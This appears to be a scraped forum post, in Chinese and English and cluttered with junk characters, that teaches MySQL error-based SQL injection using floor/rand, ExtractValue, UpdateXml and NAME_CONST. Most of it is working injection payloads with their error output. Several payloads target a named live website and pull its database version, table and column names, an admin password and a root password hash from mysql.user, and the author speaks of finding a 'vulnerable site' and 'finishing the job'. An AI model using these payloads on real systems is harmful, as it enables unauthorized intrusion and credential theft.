|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
% b0 w- }, ^/ w8 m首先进行正常查询: mysql> select * from article where id = 1;$ d2 j4 k5 h, n( n
+—-+——-+———+
" Y8 z% b# U! m8 \4 || id | title | content |# p. |: V" Z3 ^$ }( }, \
+—-+——-+———+
8 U) G) R" J9 M# A| 1 | test | do it |
0 g" i7 O: q9 J; ^8 F0 ?1 w+ k+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);2 ]( p3 _6 I- u: Z3 B2 o
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。9 |- \& A' O& e0 I; {2 R8 I
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);2 r4 M5 A, W! Y* v
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
$ _% E# S# ]3 T: a# CERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue, \# _# I5 W% H0 o* S' \- j
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–# a+ ]+ x5 x8 o6 J6 }% V3 E m
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
9 v/ M' | |# Z: N" e% W+ c" E. S; Y% ^: ~
; x4 S! q% o0 c+ s9 p: b; Z再收集:
; D! V( o1 [) [0 f* p4 shttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ( v+ A+ f1 N Y1 p* z- }
J. w3 q( h: z- B) T9 u# L k0 w
Error uplicate column name ‘5.0.27-community-nt’Error uplicate column name ‘5.0.27-community-nt’
/ E& M4 Z5 f% }" w4 \" p5 R, D" Z5 |$ ^
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
5 n" c1 y; c( [/ X: b# b9 |" S5 L
: }, C' e$ o% V! `' eError uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
1 b F) D5 }; b' X! B
$ A G1 C6 P9 XMYSQL高版本报错注入技巧-利用NAME_CONST注入1 {3 x" s% w5 O* G) f
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
$ P, I6 y4 M' z/ n. ]) L
# p' G( o, {: |8 C% h4 K R
6 K/ T/ T* d! T7 s" `4 X相关信息
. H' k; A7 w& J- e2 j+ E4 l/ k! O6 @8 d
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.3 @' b4 d6 ?, g% n* `+ y
5 m0 d8 T- W( H: l. x/ Q+ E
Code:
8 Y, t3 t1 t$ O" ONAME_CONST(DATA, VALUE)7 B2 a7 D! |6 F, Z
. f3 _7 ^( f% G' P8 [$ z% yReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
0 H( e- r8 e1 O6 k K. \$ r% P; e; v4 Z. P
SELECT NAME_CONST('TEST', 1)
; B& X; |) H/ c- ]" |# L- Y7 _! s l/ w! {. a0 j; W
1 n* M6 B4 s6 p
, H+ f" f4 _3 M|---------------|
$ r5 r+ {3 P* p+ ^: o6 H- S| TEST |
4 }+ R V; i8 q) D| |0 H5 X. Z& t5 o/ g' Q" {9 C
|---------------|
' t8 T @7 H( u" |& d| 1 |) @( l9 W- u7 i$ m! w; m
| |% W$ W: T( `$ K5 y7 f- k
|---------------|" ^( [# u: z1 c2 v+ r7 M
3 Q7 A8 K& R4 R }& [1 r
; i4 R+ h( b! y- U# [, N4 I& {8 P9 \- M' I4 U% l' R D
) t$ M2 X4 c$ a3 Z
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
% i& f" {( t; k' l9 d5 J7 yIntro to MySQL Variables
4 z; K t2 X* X) e% Z9 z
9 ^: e9 ~9 e3 W" ROnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
8 @: m+ `) K3 u1 q$ c0 q+ S' H: }6 {7 q6 W0 z+ \5 c; h& h3 u3 z2 u
Code:
) u' T/ C. h s+ d$ ihttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261- X, g( x9 S; Q- T2 q! T
* B9 A9 |0 P" E- E0 f: t
. K8 a2 k) B% [8 Y4 h# D
^+ D" F8 ?% }: A
# p$ S6 h( f; M1 S7 a2 i# S
. `. I5 u A( k1 `8 L
Code:1 H# P. U- L9 a; d
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--1 ?# V6 U& f A
2 j1 N7 t) [/ r7 f
5 E9 y8 i4 V! S8 KVAR = Your MySQL variable.9 u$ }4 z3 I" ~) P( o/ E
% G) [/ t6 w+ ^
MySQL 5.1.3 Server System Variables
+ s" ?8 L$ c3 P/ U
0 w, o! H* j0 h+ u( F, p- CLet's try it out on my site.., {( P% ]/ s$ C7 Q/ \
: @% j) G- u- G$ X! B2 Z
Code:+ ~2 G' _! b& D6 E; b# N% X) B6 p
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
; z4 ?7 r4 j9 D' r* ^( |+ X% }9 ?
" Y) U' m" ]& ?5 w1 r0 }3 BError uplicate column name '5.0.27-community-nt'
6 I; ]" M8 `$ v4 M) S, h/ B0 l& l! k
4 Z2 N# Q, m& e9 L; S6 M8 M* ~! ]) N1 U
- t$ \8 M0 `6 D" o. R) ^, i2 J: \4 ~9 K9 Q, V, C
$ I) Q, U- x; E- s8 ?6 zNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
0 I) v% ~' u& X1 M6 x) U, U( q4 E/ B+ D
+ [6 x1 B+ X4 @- {4 M: d" EData Extraction
6 e% v$ q0 S$ |/ Z5 D. U- l% b% _5 t. r3 Q5 U6 @
Code:* F4 e; _/ |; |% X* r _* t# S
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
; y1 T4 }3 u: u. W+ q! u( _" A2 _8 M. P/ N7 f1 m/ E
8 a8 r8 x, Z# W% H& T9 }We should get a duplicate column 1 error...
) K0 Q2 u( @/ T. \, A
8 [: F* p6 S0 t# s wCode:
6 g4 d4 t" u7 d* Q$ y! ehttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--' w; n8 H% k* t4 A+ E
E. Q+ I$ _# w/ t# OError uplicate column name '1
/ Y8 k1 O/ a! j! R- q* ^& I+ g9 Z1 U k; b
, D% w- E0 k1 K! [) e- b* S+ ]
X5 k5 A. r ~! O" e$ R* J! F
' y# H# P, }" {; V {: X- ~% q7 Y( w$ f/ a# e+ v8 t
. Y8 L9 G5 C, F+ |5 X
Now let's get the tables out this bitch..
: E/ J! g9 u8 ]7 T5 C) b
7 ~' R) y9 o3 D/ ]: R, J4 cCode:. |1 N0 e. {7 U& E5 d
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
8 x$ u# J+ L4 F. U
5 Z3 x4 ?' [: Z0 m- t6 F4 m0 K, H% O! T$ ~) z
Let's see if it works here, if it does, we can go on and finish the job." N* F& J/ {, {9 [1 G% @. ^
8 U# ~8 @) |# y
Code:3 H) ~; n9 j3 Z
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--2 q3 W9 q$ f! B5 R. a
5 j3 Z$ Q. [: f+ [1 B* n3 k$ \) U8 Z, o) _: K5 z
Error uplicate column name 'com_admanage
7 a/ s. p) I) q4 Q+ U8 `+ n* Y0 Z( F4 e) b
' M t$ ^( ]; d; Q9 ~% h$ [
. ?( q( U, }/ Y' b: w6 a$ {* O, |5 V
3 D2 s2 C2 {) \( P- J6 X0 z$ Z/ O9 q7 I. d5 K( U- I' S* {" F* o3 f4 Y
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
; m% Z* l: ?! w. e% \" }. Y$ |8 z: z5 B0 r5 _
Let's get the columns out of the user table..
! J0 \4 Y5 }* S. l! `/ Y- {. A* @
- e, C! Y- m- t' z5 gCode:# z3 E* I! f. u! a9 X" e3 j
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
- F0 o6 q; _$ U+ W- m o/ {6 Z0 L7 f" I6 S
0 ^2 m" @* N( o
So mine looks like this, and I get the duplicate column name 'Host'.
# a3 r9 R0 t Q2 l( |% a p: R/ Y4 l B7 P" Y! N- d6 [& K9 ?
Code:
- c7 L/ Z0 @" {- {http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--- u, b! f, I. x+ U$ ?2 l, U1 T# y
& T5 _! }" V4 RError uplicate column name 'Host') E. ]- R% G1 Y' G4 U
+ P2 l0 \8 a2 \$ f
|0 B5 U* ]' u( Q
+ K+ B4 J1 \# v- g: f2 e E2 F1 T) E* j6 ]' b/ `" x) C9 Y+ {
% \, |# h& L8 V7 ~8 s6 V/ m0 V% i
Q7 ^5 S' E$ b$ e3 ]$ C7 IWoot, time to finish this bitch off.) s% e! I9 W4 V0 j$ f
7 A$ Q7 L# E6 K% r4 B+ m( v( G( W
Code:
. x; k6 X Q ^1 W, F+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
+ k: u7 y. h; K; x7 M7 G* H" i4 }9 J0 D+ L
3 P( `( F( h8 n3 Z! LSo mine looks like this...2 V/ W! O) P1 w* w
" ] R, }% \0 ~4 X' K
Code:( b1 R) f7 Q1 a1 z& r6 w# y- H
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--5 C; y% c0 l' P3 q8 g- X
& ^# I( M$ @% b6 C
Error uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
. P {' v5 U5 P. f$ r; e" t- C6 }9 t- Y7 Y1 T' x
* X+ B D0 u9 y. h- ]
- w# m# f/ y* d- |0 E/ h
. S2 o8 I: i- ~$ W! y
6 `( g" B3 @( F/ Q+ [5 P" v& v
) m( Y0 a7 s! s! G4 e, f) |And there we have it, thanks for reading.
& m, T' G+ R$ x& a+ |5 R& k
l# V9 |+ M6 {1 e" m |